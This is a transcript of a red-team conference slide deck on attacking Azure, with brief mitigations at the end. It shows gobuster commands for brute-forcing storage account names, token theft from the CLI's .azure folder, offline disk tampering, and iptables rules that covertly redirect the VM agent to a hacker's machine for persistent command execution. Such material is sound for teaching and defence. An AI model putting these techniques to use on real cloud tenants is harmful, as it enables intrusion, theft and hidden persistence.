Blue Cloud of Death: Red Teaming Azure

BLUE CLOUD
OF DEATH
Red Teaming Azure

View Slide

AGENDA
…
Agenda
• Who Am I?
• Azure Overview
• Initial Access
• Storage Access
• Endpoint Access
• Expanding Access
• Persisting Access
Bryce Kunz
@TweekFawkes

View Slide

Whois
…

View Slide

THE PAST
RED & BLUE...
Red Team
Adobe
Digital Experience (DX)
Bryce Kunz
@TweekFawkes
Offense
NSA
Defense
DHS SOC

View Slide

THE PRESENT
CYBER SECURITY SERVICES
Stage 2 Security BSidesSLC
( CyberSecurity Services ) ( By & For the People )
Stage2Sec.com BSidesSLC.org
Bryce Kunz
@TweekFawkes

View Slide

TRAINING
AWS & AZURE EXPLOITATION:
MAKING THE CLOUD RAIN SHELLS!
CNO.io -Training
(Salt Lake City, Utah)
July 12th & 13th
SOLD OUT!
BlackHat USA
(Las Vegas, NV)
August

View Slide

Azure Overview
…

View Slide

CLOUD
Azure CIoud
My boss assured me,
that’s all we needed to know… :P

View Slide

DESIGN
Azure CIoud
Portal Control Data
cloud demystified!

View Slide

ADMINS
Azure CIoud
Portal Control Data
Admin
…

View Slide

CONTROL
Azure CIoud
Portal Control Data
Admin
… From our vantage point …
… mostly just REST APIs …

View Slide

DATA
Azure CIoud
Portal Control Data
Admin
… here lies user/customer/account data …

View Slide

SERVICES
Azure CIoud
Portal
VMs
Control
Storage
Data
Apps
Admin
…too many for any human to care about…
LBs

View Slide

SERVICES
Portal
VMs
Control
Storage
Data
Apps
Admin
…too many for any human to care about…
LBs
Azure CIoud

View Slide

AGENTS
Azure CIoud
Portal
VMs
Control
Storage
Data
Apps
Admin
…
LBs
Agent

View Slide

DEVS
Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
Dev
CI
Pipeline
VMs

View Slide

USERS
Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev

View Slide

Dooms Day
…

View Slide

DEVOP-OCALYPSE
Bryce Kunz - @TweekFawkes
… $50k!?!?!?

View Slide

DEVOP-OCALYPSE
…EC2 instances destroyed…

View Slide

Accounts
…

View Slide

ACCOUNTS
…
Customer Types:
• Standard
• Enterprise Agreement
• - Departments
Account Admin
Service Admin
Co-Admin
Subscription
(e.g. IT)
Azure Account (Center)
Subscription
(e.g. R&D)
RG
Stage
RG
Prod
R R R R
RG
Stage
RG
Prod
R R R R
Service Admin
Co-Admin

View Slide

Initial Access
…

View Slide

OSINT
Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Internet
Collaboration
Hacker

View Slide

GITHUB
Google Dork:
site:github.com web.config
"StorageConnectionString"
"DefaultEndpointsProtocol"

View Slide

PASTEBIN
Find a Azure Secrets
• Collaboration
• - PasteBin.com

View Slide

REPOS
Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Internet
Collaboration
Hacker
Repos

View Slide

BITBUCKET
• Open Source Intel
• Code Repositories
• - BitBucket, GitLab
• - Gerrit, GitBlit, Git
• - SVN, etc…

View Slide

CI
Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Internet
Collaboration
Hacker
Repos

View Slide

DEPLOY
ACCESS
• Deployment Tools
• - Puppet, etc…
• - Jenkins, etc…

View Slide

Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Internet
Collaboration
Hacker
Repos
ENDPOINT

View Slide

HACK & D/L
ACCESS
• Deployment Tools
• Configuration Files
• - Classic Hacks
• -- D/L Secrets

View Slide

Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Internet
Collaboration
Hacker
Repos
MANY ROADS
TO PWNAGE

View Slide

I
Heart
AWS
&
Azure!
Just in case you think AWS or Azure is bad…
Here is what I really like about it!
• Assessment Management is Awesome!
• Scaling of Logging can be Amazing!
• Read-Only / Auditor Access is Easy to Setup!

View Slide

Azure Storage
…

View Slide

STORAGE
…
VMs
Storage
LBs
Users
Web Server
Apps

View Slide

STORAGE
…
VMs
Storage
LBs
Users
Web Server
Apps
Hacker

View Slide

STORAGE
.

View Slide

AZURE BLOBS
Endpoints: https://myaccount.blob.core.windows.net/mycontainer/myblob
e.g.: https://bcodstoragetest005.blob.core.windows.net/containertest005/test.txt
Storage Account Name: bcodstoragetest005
Container Name: containertest005
Blob Name: test.txt

View Slide

DNS BRUTE FORCE
- Only contains lowercase letters and numbers.
- Name must be between 3 and 24 characters.

View Slide

GOBUSTER - DNS
gobuster -m dns -u "blob.core.windows.net" -i -t
100 -fw -w /root/blobdns/3_chars.txt

View Slide

DNS BRUTE FORCE
…
…
- Only contains lowercase letters and numbers.
- Name must be between 3 and 24 characters.
Lower Chars & Nums Count Run Time (100 Threads)
3 46,656 ~1 min
4 1,679,616 ~25min
5 60,466,176 ~15 hours
6 … etc … … etc …

View Slide

GOBUSTER - DIR
gobuster -m dir -u
“https://bcodstoragetest005.blob.core.windows.n
et” -i -t 100 -e -s 200,204 -w quickdir.txt

View Slide

AZURE BLOB NAMES
Blob Name: test.txt

View Slide

BRUTE FORCE
Possible but kind of sucks to brute force or guess three separate variables/parameters in the URL.
Blob Name: test.txt

View Slide

STORAGE
…
VMs
Storage
LBs
Users
Web Server
Apps
Hacker

View Slide

NIMBUSLAND
Check if an IP address is Azure or AWS

View Slide

LOLRUSLOVE
Spider Website for Links to Azure Blobs
• CNAME Lookup on FQDNS
TODO: INSERT Screen Shot
TODO: Demo?

View Slide

Storage Access
…

View Slide

Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Internet
Collaboration
Hacker
Repos
STORAGE

View Slide

FIND CERT
*.publishsettings
Get-AzurePublishSettingsFile
• Management Certificates
A "publish settings file" is an XML file with a .publishsettings file name extension. The file
contains an encoded certificate that provides management credentials for your Azure
subscriptions.

View Slide

FIND SECRET
“web.config” - ASP.NET
“app.config” - C#.NET
• SAS URI
• Connection String
• Account Name & Key

View Slide

STORAGE EXPLORER
“Install Azure Storage Explorer”

View Slide

STORAGE EXPLORER
• SAS URI
• Connection String
• Account Name & Key

View Slide

STORAGE EXPLORER
• Download Files!
• Modify Files!

View Slide

VHDS
*disks*
• vhds!

View Slide

VHDS
Download vhds
• Code Review
• Secrets on Disk
• Linux - grep for “shadow” hashes

View Slide

MANAGED DISKS
2017 Azure Feature
• By Default…
• No VHDs in blob storage containers!

View Slide

Storage Persistence
…

View Slide

Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Internet
Collaboration
Hacker
Repos
STORAGE

View Slide

STORAGE EXPLORER
Create SAS!
• Another way to access the resource

View Slide

DEMo: SAS Offline Minting!
…

View Slide

SAS TOKEN OFFLINE
MintyOffline
Append the Following:
- Storage Account Name
- Permissions, Protocol
- Service, Resource Type
- Start Time, Expire Time
- & API Version
HMAC to creation token using:
- Key -> Storage Key
- Msg -> Appended String
- SHA256
Formatting of the Data (e.g. Encode)

View Slide

CLI Endpoint Access
…

View Slide

Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Internet
Collaboration
Hacker
Repos
ENDPOINT

View Slide

SETUP CLI
“Install Azure CLI 2.0 on Windows”

View Slide

CLI AUTH.
“az login”
(After logging in, your login token is
valid until it goes for 14 days without
being used.)

View Slide

BROWSER COOKIE
“az login”
being used.)

View Slide

STEAL COOKIE!
“az login”
being used.)

View Slide

CLI AUTH.
“az login”
being used.)

View Slide

AUTH. TOKEN “.azure” folder
“azureProfile.json”

View Slide

STEAL TOKEN“.azure” folder
“accessTokens.json”

View Slide

WHOAMI
“az account show”

View Slide

Expand Access
…

View Slide

Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Hacker
DATA -> CONTROL

View Slide

AZURE META
Metadata Service: 169.254.169.254
curl http://169.254.169.254/metadata/v1/maintenance
curl http://169.254.169.254/metadata/v1/InstanceInfo
(these are mostly useless for hackers…) but useful information is copied into the …
/var/lib/waagent directory when the instance is created… (root access needed)
• IP address, hostname, subscription ID, resource group name, etc…
…

View Slide

Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Hacker
CONTROL -> DATA

View Slide

CAPTURE IMAGE
…

View Slide

HARD BOOT
Google: “Reset local Windows password for Azure VM offline”
…
Horrible OPSEC but it works…
- Power off a server
- Mount the server’s hard drive using another VM
- Modify the server for remote access (e.g. add an SSH key to root user)
- Power back on the server & PROFIT!

View Slide

RESET
…
Windows
• RDP Password Reset
Linux
• SSH Key Reset
• Create User

View Slide

SCRIPTS
…
Linux
• VM Extension - CustomScript

View Slide

Persistence
…

View Slide

Azure CIoud
Portal Control
Storage
Data
Apps
Admin
…
LBs
…
CI
Pipeline
Users
VMs
Dev
Internet
Collaboration
Hacker
Repos
CONTROL

View Slide

SERVICE PRINCIPALS
(the recommended approach)
Permissions-Restricted Accounts
“az login --service-principal” …
…not tied to any particular user…
…have permissions on them assigned
through pre-defined roles.
Multiple Passwords!

View Slide

AGENTS
Azure CIoud
Portal
VMs
Control
Storage
Data
Apps
Admin
…
LBs
Agent

View Slide

DOCUMENTATION?
Where we're going, we don't need docs!

View Slide

START DIGGING
• ps auxfww
• file
• python source code review
Listening Services
• netstat -nltpu
Active Connections
• netstat -natpu

View Slide

• b: set a breakpoint
• c: continue debugging until you hit a breakpoint
• s: step through the code
• n: to go to next line of code
• l: list source code for the current file (default: 11 lines including the line being executed)
• u: navigate up a stack frame
• d: navigate down a stack frame
• p: to print the value of an expression in the current context
PYTHON DEBUGGER
• pdb

View Slide

SYSDIG sysdig -w 005.scap
systemctl start walinuxagent.service
/usr/bin/python3 -u /usr/sbin/waagent –daemon
sysdig -r 005.scap …
• -c topfiles_bytes
• -c topprocs_net
• -c echo_fds
• -c fdbytes_by fd.directory "fd.type=file“
• -c fdbytes_by fd.filename
"fd.directory=/var/lib/waagent“
…

View Slide

TCPDUMP ip.addr == 168.63.129.16

View Slide

AGENTS
Azure CIoud
Portal
VMs
Control
http://168.63.129.16
Storage
Data
Apps
Admin
…
LBs
Agent

View Slide

TASKS
Periodically pulls HTTP API for taskings
• http://168.63.129.16
• (local azure fabric address)
2
• Signals agent for additional tasks
Control
http://168.63.129.16
GET /machine/?comp=goalstate
---
2…
Agent

View Slide

HOST CONFIGS
Pulls hostingEnvironmentConfig
Control
http://168.63.129.16
GET /machine/
…
type=
hostingEnvironmentConfig
---
rd_fabric_stable_dhf5.150807-
2320.RuntimePackage_1.0.0.14.
zip
Agent

View Slide

CERTS
Pulls certificates
Control
http://168.63.129.16
GET /machine/
…
comp=certificates
---
pfx
Agent

View Slide

EXTENSION CONFIGS
Pulls Extension Configuration
• In this case, the command to run
Control
http://168.63.129.16
GET /machine/
…
type=extensionsConfig
---
Command to Run
Agent

View Slide

the Journey!
…

View Slide

VMs
Portal Control
Storage
Data
Admin
…
…
CI
Pipeline
Users
VMs
Dev
Internet
Hacker
Repos
CREDS IN REPO

View Slide

VMs
Portal Control
Storage
Data
Admin
…
…
CI
Pipeline
Users
VMs
Dev
Internet
Hacker
Repos
VHDS -> CERTS

View Slide

VMs
Portal Control
Storage
Data
Admin
…
…
CI
Pipeline
Users
VMs
Dev
Internet
Hacker
Repos
SUBSCRIPTION

View Slide

VMs
Control
Storage
Data Users
VMs
Hacker
CUSTOM SCRIPT

View Slide

PERSIST?
Without getting caught?
Bypass
• File Integrity Monitoring
• So we can’t modify files
• osquery - process list
• So we can’t be seen in ps
• osquery - netstat
• So we can’t be seen in netstat
… ?

View Slide

VMs
Storage
Users
Hacker
AGENT
Control
http://168.63.129.16
Agent
VMs
10.0.4.4
Already Running
Pulling for Updates…

View Slide

VMs
Storage
Users
Hacker
BEACHHEAD
Control
http://168.63.129.16
Malware
Agent
Beachhead
10.0.4.5
VMs
10.0.4.4
Ideally…
• Not of high value
• Not monitored closely
Install our Malware
• To ensure access

View Slide

VMs
Storage
Users
VMs
10.0.4.4
Hacker
REDIRECT
Control
http://168.63.129.16
Beachhead
10.0.4.5
Malware
Agent
Redirect Agent
• via iptables
iptables -t nat -I OUTPUT
-p tcp --dport 80 -d
168.63.129.16 -m
comment --comment
"totes not evil" -j DNAT --
to-destination
10.0.4.5:80
Netstat Looks Normal!
No New Procs!

View Slide

VMs
Storage
Users
VMs
10.0.4.4
Hacker
MITM
Control
http://168.63.129.16
Beachhead
10.0.4.5
Malware
Agent
Pass API Requests
• via mitmproxy
iptables -t nat -I OUTPUT
-p tcp --dport 80 -d
10.0.4.5 -m comment --
comment "totes not evil"
-j DNAT --to-destination
168.63.129.16:80
MITM

View Slide

VMs
Storage
Users
Hacker
EXEC
Control
http://168.63.129.16
Beachhead
10.0.4.5
Malware
Tasks Created within the
Azure Subscription for
the Beachhead with the
MITM software on it,
which will get redirected
and executed on the
remote target through
the pulling process of the
Azure endpoint agent
MITM
Agent
VMs
10.0.4.4

View Slide

DEMo: C2 via waagent Redirection
…

View Slide

GOING THE DISTANCE!
• Only match the redirect during certain times of the day
• man iptables-extensions -> time
• … -m time --timestart 01:00 --timestop 02:00 --days Mon,Tue,Wed,Thu,Fri …
• Match the redirect periodically
• pulls via GETs every 3 seconds
• … -m limit -limit … -limit-burst …

View Slide

MITIGATIONS
• Single Purpose Secrets
• Limited the Access of each Secret
• Create roles and limit the access of each role
• You can ACL off secrets to only work from certain IP addresses
• Log API calls (e.g. cloudtrail)
• Never use root secrets (use as a break glass account only)
• Rotate Secrets Frequently
• Encrypt secrets within GIT and other data stores
…

View Slide

THANKS!
Stage 2 Security
( Red Teaming AWS & Azure Env. )
Stage2Sec.com
Bryce Kunz
@TweekFawkes
CNO.io -Training
(Salt Lake City, Utah)
July 12th & 13th

View Slide

Blue Cloud of Death: Red Teaming Azure

Blue Cloud of Death: Red Teaming Azure

TweekFawkes

More Decks by TweekFawkes

Other Decks in Technology

Featured

Transcript